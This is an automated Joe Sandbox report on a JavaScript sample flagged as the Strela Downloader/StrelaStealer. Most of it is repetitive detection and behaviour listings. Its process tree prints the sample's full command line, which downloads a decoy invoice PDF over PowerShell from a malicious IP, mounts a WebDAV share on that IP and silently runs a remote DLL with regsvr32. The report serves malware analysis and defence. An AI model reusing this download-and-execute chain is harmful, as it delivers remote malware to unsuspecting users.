Windows
Analysis Report
19500684172643252.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 3104 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\19500 6841726432 52.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6024 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\151 9128261194 06.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6972 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3112 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 5768 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7232 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7420 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 24 --field -trial-han dle=1744,i ,541355169 3700197521 ,120507524 7872462194 3,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7304 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
true |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588531 |
Start date and time: | 2025-01-11 02:06:05 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 41s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 19500684172643252.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 34.237.241.83, 54.224.241.105, 50.16.47.176, 18.213.11.84, 184.28.90.27, 162.159.61.3, 172.64.41.3, 2.16.168.105, 2.16.168.107, 23.209.209.135, 2.22.50.144, 2.22.50.131, 23.200.0.133, 23.200.0.169, 192.168.2.9, 13.107.246.45, 4.245.163.56, 23.203.104.175
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:06:56 | API Interceptor | |
20:07:00 | API Interceptor | |
20:07:00 | API Interceptor | |
20:07:12 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4931734701619909 |
Encrypted: | false |
SSDEEP: | 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaH:cJhXC9lHmutpJyiRDeJ/aUKrDgnmN |
MD5: | 665C093D4A311A7E4B43F2219C2FA3CF |
SHA1: | EE849B835EDB208621FA74DE8C78BADB090B77DC |
SHA-256: | 796A941015D2000DA8DF63560108DFF0CE00AEA65F235277BE2586FBEDCB609A |
SHA-512: | 8912F298B51DA44119A4FB59E6709F22087C7DD9F835FA015577700E30D2AFE84FA4EABB92E07184E408B1A732AA0AB40E794DF5C175A6573904F0B30D01A7F6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7216283068056089 |
Encrypted: | false |
SSDEEP: | 1536:7SB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:7azaNvFv8V2UW/DLzN/w4wZi |
MD5: | 33E0DD3EE829BFB18F583602888674AD |
SHA1: | F7CE630543ED7C38C1F7DB6593DAF63AED2DA0A6 |
SHA-256: | A97A335D31A15C15A6379A64A45411428B58491E2740A5BC7C18E977F63CF760 |
SHA-512: | 2F61528B9BB2E847B789FF66D67BAD21FC57BD4399BFBD4F72C5040D9609C7ED1F6F72E553521B3A770DF3CB80C28DAEDBB1FC437B4B4171A7EB3F0B14CA2F6E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07978428729034695 |
Encrypted: | false |
SSDEEP: | 3:dtKYeSHACgr/fgsCrZClW/tWr5Xloll+SHY/Xl+/rQLve:/KzCAHfgs3GMr8AS4M |
MD5: | 40CF26651CBF34985F50E2AB988BF37C |
SHA1: | 81552BE46DEE4390F499946F82B7CA2F2E358072 |
SHA-256: | 97017003FBA36A86B28ACC25637B635B7C2CF21AEBF14BA2DA4A54FE6380F242 |
SHA-512: | 2CC491AAF02F5E13BB37228E8D5472E4AB82F6C3584E0368B193805C0B972F556BCEF6D6C6B5D313D7C86237CF176408B84FF30E05F3A5CA0F0BD75FE7305F6A |
Malicious: | false |
Preview: |
